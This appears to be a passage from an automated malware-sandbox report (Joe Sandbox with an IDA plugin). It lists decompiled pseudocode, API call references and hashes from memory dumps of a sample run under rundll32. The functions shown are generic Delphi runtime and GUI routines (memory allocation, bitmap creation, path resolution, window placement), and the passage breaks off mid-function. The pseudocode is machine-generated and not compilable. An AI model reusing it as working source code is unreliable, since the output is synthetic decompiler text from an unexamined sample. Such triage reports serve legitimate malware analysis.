                            • Part of subcall function 00E1557C: RegCloseKey.ADVAPI32(?,00E15688,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E1567B
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Open$FileModuleNameQueryValue$Close
                          • String ID:
                          • API String ID: 2796650324-0
                          • Opcode ID: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
                          • Instruction ID: 47a63032aed66f4f9c989ea5a1a609c07a3741fc1bb8b110743360aabf4198c4
                          • Opcode Fuzzy Hash: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
                          • Instruction Fuzzy Hash: 21E06D72A00610CBCB14DE6CC8C1A8633E8AB48794F001995ED64DF24AE3B0DDA08BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E116B8(signed int __eax, void** __ecx, intOrPtr __edx) {
                          				signed int _v20;
                          				void** _v24;
                          				void* _t15;
                          				void** _t16;
                          				void* _t17;
                          				signed int _t27;
                          				intOrPtr* _t29;
                          				void* _t31;
                          				intOrPtr* _t32;
                          
                          				_v24 = __ecx;
                          				 *_t32 = __edx;
                          				_t31 = __eax & 0xfffff000;
                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                          				 *_v24 = _t31;
                          				_t15 = _v20 - _t31;
                          				_v24[1] = _t15;
                          				_t29 =  *0xe7f5ec; // 0x902cbc
                          				while(_t29 != 0xe7f5ec) {
                          					_t17 =  *(_t29 + 8);
                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                          					if(_t31 > _t17) {
                          						_t17 = _t31;
                          					}
                          					if(_t27 > _v20) {
                          						_t27 = _v20;
                          					}
                          					if(_t27 > _t17) {
                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                          						if(_t15 == 0) {
                          							_t16 = _v24;
                          							 *_t16 = 0;
                          							return _t16;
                          						}
                          					}
                          					_t29 =  *_t29;
                          				}
                          				return _t15;
                          			}

                          APIs
                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00E11725
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 1ea95792d93f2a827ef2f2e218774e02db653ddb3eb74aeaa08ca249b985d082
                          • Instruction ID: a75f1e3c77e5912b68a8e9381fca3af73583602d1b2e0a6e6d8bf85730e99983
                          • Opcode Fuzzy Hash: 1ea95792d93f2a827ef2f2e218774e02db653ddb3eb74aeaa08ca249b985d082
                          • Instruction Fuzzy Hash: A411CE76A047019FC310DF29CC80A9ABBE5EFC5764F05C6BDE698AB394D630AC808B40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E2DCE8(intOrPtr _a4, intOrPtr _a8) {
                          				void* _t14;
                          				void _t15;
                          				intOrPtr _t25;
                          				char* _t26;
                          				void* _t35;
                          
                          				if( *0xe7f88c == 0) {
                          					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                          					_t35 = _t14;
                          					_t15 =  *0xe7f888; // 0x8d0000
                          					 *_t35 = _t15;
                          					_t1 = _t35 + 4; // 0x4
                          					E00E128C8(0xe7c408, 2, _t1);
                          					_t2 = _t35 + 5; // 0x5
                          					 *((intOrPtr*)(_t35 + 6)) = E00E2DCE0(_t2, E00E2DCC0);
                          					_t4 = _t35 + 0xa; // 0xa
                          					_t26 = _t4;
                          					do {
                          						 *_t26 = 0xe8;
                          						_t5 = _t35 + 4; // 0x4
                          						 *((intOrPtr*)(_t26 + 1)) = E00E2DCE0(_t26, _t5);
                          						 *((intOrPtr*)(_t26 + 5)) =  *0xe7f88c;
                          						 *0xe7f88c = _t26;
                          						_t26 = _t26 + 0xd;
                          					} while (_t26 - _t35 < 0xffc);
                          					 *0xe7f888 = _t35;
                          				}
                          				_t25 =  *0xe7f88c;
                          				 *0xe7f88c =  *((intOrPtr*)(_t25 + 5));
                          				 *((intOrPtr*)(_t25 + 5)) = _a4;
                          				 *((intOrPtr*)(_t25 + 9)) = _a8;
                          				return  *0xe7f88c;
                          			}

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00E2DD06
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 579f32a05cc2f35e332b4a81a59a8ece7af0675d64e6c7a77f0a0c6e91e83be3
                          • Instruction ID: 62fed4c5f04aefd64be9db9f2f940da40d32f9f317622602155f2e647ddcd853
                          • Opcode Fuzzy Hash: 579f32a05cc2f35e332b4a81a59a8ece7af0675d64e6c7a77f0a0c6e91e83be3
                          • Instruction Fuzzy Hash: 6F1148742443158FD714DF19EC81B86FBE5EB88360B20D53AEA58AB389D370E845CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00E34154(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                          				struct HBITMAP__* _v8;
                          				struct HPALETTE__* _v12;
                          				struct HPALETTE__* _v16;
                          				struct HPALETTE__* _v20;
                          				void* _v24;
                          				struct HDC__* _v28;
                          				struct HDC__* _v32;
                          				struct HDC__* _v36;
                          				BITMAPINFO* _v40;
                          				void* _v44;
                          				intOrPtr _v48;
                          				struct tagRGBQUAD _v52;
                          				struct HPALETTE__* _v56;
                          				intOrPtr _v116;
                          				intOrPtr _v120;
                          				intOrPtr _v132;
                          				intOrPtr _v136;
                          				void _v140;
                          				struct tagRECT _v156;
                          				void* __ebx;
                          				void* __ebp;
                          				signed short _t229;
                          				int _t281;
                          				signed int _t290;
                          				signed short _t292;
                          				struct HBRUSH__* _t366;
                          				struct HPALETTE__* _t422;
                          				signed int _t441;
                          				intOrPtr _t442;
                          				intOrPtr _t444;
                          				intOrPtr _t445;
                          				void* _t455;
                          				void* _t457;
                          				void* _t459;
                          				intOrPtr _t460;
                          
                          				_t457 = _t459;
                          				_t460 = _t459 + 0xffffff68;
                          				_push(_t419);
                          				_v16 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v20 = 0;
                          				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                          					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                          						E00E33D10(_v8);
                          						_v116 = 0;
                          						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                          							E00E31054();
                          						}
                          						_v28 = E00E31174(GetDC(0));
                          						_v32 = E00E31174(CreateCompatibleDC(_v28));
                          						_push(_t457);
                          						_push(0xe347a2);
                          						_push( *[fs:edx]);
                          						 *[fs:edx] = _t460;
                          						if( *(_a8 + 0x18) >= 0x28) {
                          							_v40 = E00E126CC(0x42c);
                          							_push(_t457);
                          							_push(0xe344ac);
                          							_push( *[fs:edx]);
                          							 *[fs:edx] = _t460;
                          							 *(_a8 + 0x18) = 0x28;
                          							 *((short*)(_a8 + 0x24)) = 1;
                          							if( *(_a8 + 0x26) == 0) {
                          								_t290 = GetDeviceCaps(_v28, 0xc);
                          								_t292 = GetDeviceCaps(_v28, 0xe);
                          								_t419 = _t290 * _t292;
                          								 *(_a8 + 0x26) = _t290 * _t292;
                          							}
                          							memcpy(_v40, _a8 + 0x18, 0xa << 2);
                          							 *(_a8 + 4) =  *(_a8 + 0x1c);
                          							_t441 = _a8;
                          							 *(_t441 + 8) =  *(_a8 + 0x20);
                          							if( *(_a8 + 0x26) > 8) {
                          								_t229 =  *(_a8 + 0x26);
                          								if(_t229 == 0x10) {
                          									L30:
                          									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                          										E00E34108(_a8);
                          										_t104 =  &(_v40->bmiColors); // 0x29
                          										_t441 = _t104;
                          										E00E128C8(_a8 + 0x40, 0xc, _t441);
                          									}
                          								} else {
                          									_t441 = _a8;
                          									if(_t229 == 0x20) {
                          										goto L30;
                          									}
                          								}
                          							} else {
                          								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                          									if(_v16 == 0) {
                          										if(_v8 != 0) {
                          											_v24 = SelectObject(_v32, _v8);
                          											if(_v116 <= 0 || _v120 == 0) {
                          												asm("cdq");
                          												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                          											} else {
                          												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                          												_t441 = _a8;
                          												 *(_t441 + 0x38) = _t281;
                          											}
                          											SelectObject(_v32, _v24);
                          										}
                          									} else {
                          										_t76 =  &(_v40->bmiColors); // 0x29
                          										_t441 = _t76;
                          										E00E31908(_v16, 0xff, _t441);
                          									}
                          								} else {
                          									_t441 = 0;
                          									_v40->bmiColors = 0;
                          									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                          								}
                          							}
                          							_v20 = E00E31174(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                          							if(_v44 == 0) {
                          								E00E310CC(_t419);
                          							}
                          							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                          								_pop(_t442);
                          								 *[fs:eax] = _t442;
                          								_push(0xe344b3);
                          								return E00E126EC(_v40);
                          							} else {
                          								asm("cdq");
                          								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                          								E00E13AAC();
                          								E00E13AAC();
                          								goto L58;
                          							}
                          						} else {
                          							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                          								_v20 = E00E31174(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                          							} else {
                          								_v20 = E00E31174(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                          							}
                          							E00E31174(_v20);
                          							_v24 = E00E31174(SelectObject(_v32, _v20));
                          							_push(_t457);
                          							_push(0xe34753);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							_push(_t457);
                          							_push(0xe34742);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							_v56 = 0;
                          							_t422 = 0;
                          							if(_v16 != 0) {
                          								_v56 = SelectPalette(_v32, _v16, 0);
                          								RealizePalette(_v32);
                          							}
                          							_push(_t457);
                          							_push(0xe34720);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							if(_a4 == 0) {
                          								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                          							} else {
                          								_t366 = E00E30724( *((intOrPtr*)(_a4 + 0x14)));
                          								E00E25C48(0,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
                          								FillRect(_v32,  &_v156, _t366);
                          								SetTextColor(_v32, E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                          								SetBkColor(_v32, E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14)))));
                          								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                          									_v52 = E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                          									_v48 = E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14))));
                          									SetDIBColorTable(_v32, 0, 2,  &_v52);
                          								}
                          							}
                          							if(_v8 == 0) {
                          								_pop(_t444);
                          								 *[fs:eax] = _t444;
                          								_push(0xe34727);
                          								if(_v16 != 0) {
                          									return SelectPalette(_v32, _v56, 0xffffffff);
                          								}
                          								return 0;
                          							} else {
                          								_v36 = E00E31174(CreateCompatibleDC(_v28));
                          								_push(_t457);
                          								_push(0xe346f6);
                          								_push( *[fs:eax]);
                          								 *[fs:eax] = _t460;
                          								_t455 = E00E31174(SelectObject(_v36, _v8));
                          								if(_v12 != 0) {
                          									_t422 = SelectPalette(_v36, _v12, 0);
                          									RealizePalette(_v36);
                          								}
                          								if(_a4 != 0) {
                          									SetTextColor(_v36, E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                          									SetBkColor(_v36, E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14)))));
                          								}
                          								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                          								if(_v12 != 0) {
                          									SelectPalette(_v36, _t422, 0xffffffff);
                          								}
                          								E00E31174(SelectObject(_v36, _t455));
                          								_pop(_t445);
                          								 *[fs:eax] = _t445;
                          								_push(0xe346fd);
                          								return DeleteDC(_v36);
                          							}
                          						}
                          					} else {
                          						goto L58;
                          					}
                          				} else {
                          					L58:
                          					return _v20;
                          				}
                          			}

                          APIs
                          • GetObjectA.GDI32(00000000,00000054,?), ref: 00E341D4
                          • GetDC.USER32(00000000), ref: 00E341E5
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E341F6
                          • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 00E34242
                          • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 00E34266
                          • SelectObject.GDI32(?,?), ref: 00E344C3
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 00E34503
                          • RealizePalette.GDI32(?), ref: 00E3450F
                          • SetTextColor.GDI32(?,00000000), ref: 00E34578
                          • SetBkColor.GDI32(?,00000000), ref: 00E34592
                          • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,00E34720,?,00000000,00E34742), ref: 00E345DA
                          • FillRect.USER32 ref: 00E34560
                            • Part of subcall function 00E2FA64: GetSysColor.USER32(?), ref: 00E2FA6E
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 00E345FC
                          • CreateCompatibleDC.GDI32(00000028), ref: 00E3460F
                          • SelectObject.GDI32(?,00000000), ref: 00E34632
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 00E3464E
                          • RealizePalette.GDI32(?), ref: 00E34659
                          • SetTextColor.GDI32(?,00000000), ref: 00E34677
                          • SetBkColor.GDI32(?,00000000), ref: 00E34691
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00E346B9
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 00E346CB
                          • SelectObject.GDI32(?,00000000), ref: 00E346D5
                          • DeleteDC.GDI32(?), ref: 00E346F0
                            • Part of subcall function 00E30724: CreateBrushIndirect.GDI32(?), ref: 00E307CE
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                          • String ID:
                          • API String ID: 1299887459-0
                          • Opcode ID: 83966ee2530dc898bd28e5ddb013eb5265ab5af29957b603a5e156fd28fca5d5
                          • Instruction ID: 60346f20723ac60773c829fb7e222dae749ca4b58027d045cb2039d5144ce8de
                          • Opcode Fuzzy Hash: 83966ee2530dc898bd28e5ddb013eb5265ab5af29957b603a5e156fd28fca5d5
                          • Instruction Fuzzy Hash: 6C12B6B5A00208AFDB10EFA8C989FDEB7F8AB09314F519555F918AB291C774E980CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E00E153C4(char* __eax, intOrPtr __edx) {
                          				char* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				struct _WIN32_FIND_DATAA _v334;
                          				char _v595;
                          				void* _t45;
                          				char* _t54;
                          				char* _t64;
                          				void* _t83;
                          				intOrPtr* _t84;
                          				char* _t90;
                          				struct HINSTANCE__* _t91;
                          				char* _t93;
                          				void* _t94;
                          				char* _t95;
                          				void* _t96;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v16 = _v8;
                          				_t91 = GetModuleHandleA("kernel32.dll");
                          				if(_t91 == 0) {
                          					L4:
                          					if( *_v8 != 0x5c) {
                          						_t93 = _v8 + 2;
                          						goto L10;
                          					} else {
                          						if( *((char*)(_v8 + 1)) == 0x5c) {
                          							_t95 = E00E153B0(_v8 + 2);
                          							if( *_t95 != 0) {
                          								_t14 = _t95 + 1; // 0x1
                          								_t93 = E00E153B0(_t14);
                          								if( *_t93 != 0) {
                          									L10:
                          									_t83 = _t93 - _v8;
                          									_push(_t83 + 1);
                          									_push(_v8);
                          									_push( &_v595);
                          									L00E112A4();
                          									while( *_t93 != 0) {
                          										_t90 = E00E153B0(_t93 + 1);
                          										_t45 = _t90 - _t93;
                          										if(_t45 + _t83 + 1 <= 0x105) {
                          											_push(_t45 + 1);
                          											_push(_t93);
                          											_push( &(( &_v595)[_t83]));
                          											L00E112A4();
                          											_t94 = FindFirstFileA( &_v595,  &_v334);
                          											if(_t94 != 0xffffffff) {
                          												FindClose(_t94);
                          												_t54 =  &(_v334.cFileName);
                          												_push(_t54);
                          												L00E112AC();
                          												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                          													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                          													_push(0x105 - _t83 - 1);
                          													_push( &(_v334.cFileName));
                          													_push( &(( &(( &_v595)[_t83]))[1]));
                          													L00E112A4();
                          													_t64 =  &(_v334.cFileName);
                          													_push(_t64);
                          													L00E112AC();
                          													_t83 = _t83 + _t64 + 1;
                          													_t93 = _t90;
                          													continue;
                          												}
                          											}
                          										}
                          										goto L17;
                          									}
                          									_push(_v12);
                          									_push( &_v595);
                          									_push(_v8);
                          									L00E112A4();
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                          					if(_t84 == 0) {
                          						goto L4;
                          					} else {
                          						_push(0x105);
                          						_push( &_v595);
                          						_push(_v8);
                          						if( *_t84() == 0) {
                          							goto L4;
                          						} else {
                          							_push(_v12);
                          							_push( &_v595);
                          							_push(_v8);
                          							L00E112A4();
                          						}
                          					}
                          				}
                          				L17:
                          				return _v16;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E153E1
                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00E153F2
                          • lstrcpyn.KERNEL32(?,?,?,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E15422
                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00E15486
                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001), ref: 00E154BB
                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681), ref: 00E154CE
                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000), ref: 00E154DB
                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624), ref: 00E154E7
                          • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?), ref: 00E1551B
                          • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000), ref: 00E15527
                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00E15549
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                          • String ID: GetLongPathNameA$\$kernel32.dll
                          • API String ID: 3245196872-1565342463
                          • Opcode ID: ce9c767b08ae3fbf4543026003e413b01892f6f02b8cccc2f12b9007a6fd83b7
                          • Instruction ID: 6dfbbfbc01d718ea5d8ff51c500c759894f85833c96c52dba6fb0e39397fe6d6
                          • Opcode Fuzzy Hash: ce9c767b08ae3fbf4543026003e413b01892f6f02b8cccc2f12b9007a6fd83b7
                          • Instruction Fuzzy Hash: BB418F72D00659EFDB10DAA8CC85ADEB7EEEF88304F1410E1A659F7251E630DEC49B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00E5D24C(void* __eax) {
                          				void* _v28;
                          				struct _WINDOWPLACEMENT _v56;
                          				struct tagPOINT _v64;
                          				intOrPtr _v68;
                          				void* _t43;
                          				struct HWND__* _t45;
                          				struct tagPOINT* _t47;
                          
                          				_t47 =  &(_v64.y);
                          				_t43 = __eax;
                          				if(IsIconic( *(__eax + 0x180)) == 0) {
                          					GetWindowRect( *(_t43 + 0x180), _t47);
                          				} else {
                          					_v56.length = 0x2c;
                          					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          				}
                          				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                          					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                          					if(_t45 != 0) {
                          						ScreenToClient(_t45, _t47);
                          						ScreenToClient(_t45,  &_v64);
                          					}
                          				}
                          				 *(_t43 + 0x40) = _t47->x;
                          				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                          				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                          				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                          				return E00E55F80(_t43);
                           			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                           • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                          • String ID: ,
                          • API String ID: 2266315723-3772416878
                          • Opcode ID: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
                          • Instruction ID: f9e2d12bbe8b72fe4ddd7a03d2562d50d02b913862f6478e62dd5b33d9f3d2be
                          • Opcode Fuzzy Hash: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
                          • Instruction Fuzzy Hash: A6118B71504200AFCB51EFACC885ACB77E8AF49310F045A68FD58EB256DB30D9048B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00E41FAC(intOrPtr __eax, struct HWND__** __edx) {
                          				intOrPtr _v8;
                          				int _v12;
                          				intOrPtr _v16;
                          				struct HDC__* _v20;
                          				struct HWND__* _v24;
                          				void* __ebp;
                          				struct HWND__* _t92;
                          				intOrPtr _t112;
                          				intOrPtr _t115;
                          				struct HWND__* _t121;
                          				struct HWND__* _t124;
                          				intOrPtr _t128;
                          				struct HWND__* _t129;
                          				intOrPtr _t130;
                          				intOrPtr _t131;
                          				struct HWND__* _t133;
                          				struct HWND__* _t136;
                          				intOrPtr _t142;
                          				intOrPtr _t172;
                          				struct HWND__** _t201;
                          				struct HWND__* _t219;
                          				struct HWND__* _t220;
                          				intOrPtr _t229;
                          				void* _t231;
                          				void* _t232;
                          				intOrPtr _t238;
                          				intOrPtr _t246;
                          				struct HWND__* _t250;
                          				struct HWND__* _t251;
                          				struct HWND__* _t256;
                          				struct HWND__* _t257;
                          				void* _t259;
                          				void* _t261;
                          				intOrPtr _t262;
                          				void* _t264;
                          				void* _t268;
                          
                          				_t259 = _t261;
                          				_t262 = _t261 + 0xffffffec;
                          				_t201 = __edx;
                          				_v8 = __eax;
                          				_t92 =  *__edx;
                          				_t219 = _t92;
                          				_t264 = _t219 - 0x46;
                          				if(_t264 > 0) {
                          					_t220 = _t219 - 0xb01a;
                          					__eflags = _t220;
                          					if(_t220 == 0) {
                          						__eflags =  *(_v8 + 0xa0);
                          						if(__eflags != 0) {
                          							E00E13470(_v8, __eflags);
                          						}
                          					} else {
                          						__eflags = _t220 == 1;
                          						if(_t220 == 1) {
                          							__eflags =  *(_v8 + 0xa0);
                          							if(__eflags != 0) {
                          								E00E13470(_v8, __eflags);
                          							}
                          						} else {
                          							goto L41;
                          						}
                          					}
                          					goto L43;
                          				} else {
                          					if(_t264 == 0) {
                          						_t112 = _v8;
                          						_t229 =  *0xe423e0; // 0x1
                          						__eflags = _t229 - ( *(_t112 + 0x1c) &  *0xe423dc);
                          						if(_t229 == ( *(_t112 + 0x1c) &  *0xe423dc)) {
                          							_t115 = _v8;
                          							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
                          							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
                          								_t128 = _v8;
                          								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
                          								if( *((char*)(_t128 + 0x22b)) != 2) {
                          									_t129 = __edx[2];
                          									_t26 = _t129 + 0x18;
                          									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
                          									__eflags =  *_t26;
                          								}
                          							}
                          							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                          							__eflags = _t121;
                          							if(_t121 == 0) {
                          								L30:
                          								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                          								__eflags = _t124;
                          								if(_t124 == 0) {
                          									L32:
                          									 *( *((intOrPtr*)(_t201 + 8)) + 0x18) =  *( *((intOrPtr*)(_t201 + 8)) + 0x18) | 0x00000001;
                          								} else {
                          									__eflags = _t124 == 3;
                          									if(_t124 == 3) {
                          										goto L32;
                          									}
                          								}
                          							} else {
                          								__eflags = _t121 == 2;
                          								if(_t121 == 2) {
                          									goto L30;
                          								}
                          							}
                          						}
                          						goto L43;
                          					} else {
                          						_t231 = _t219 + 0xfffffffa - 3;
                          						if(_t231 < 0) {
                          							__eflags =  *0xe7c9fc;
                          							if( *0xe7c9fc != 0) {
                          								__eflags =  *__edx - 7;
                          								if( *__edx != 7) {
                          									goto L43;
                          								} else {
                          									_t130 = _v8;
                          									__eflags =  *(_t130 + 0x1c) & 0x00000010;
                          									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
                          										goto L43;
                          									} else {
                          										_t256 = 0;
                          										_t131 = _v8;
                          										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
                          										if( *((char*)(_t131 + 0x22f)) != 2) {
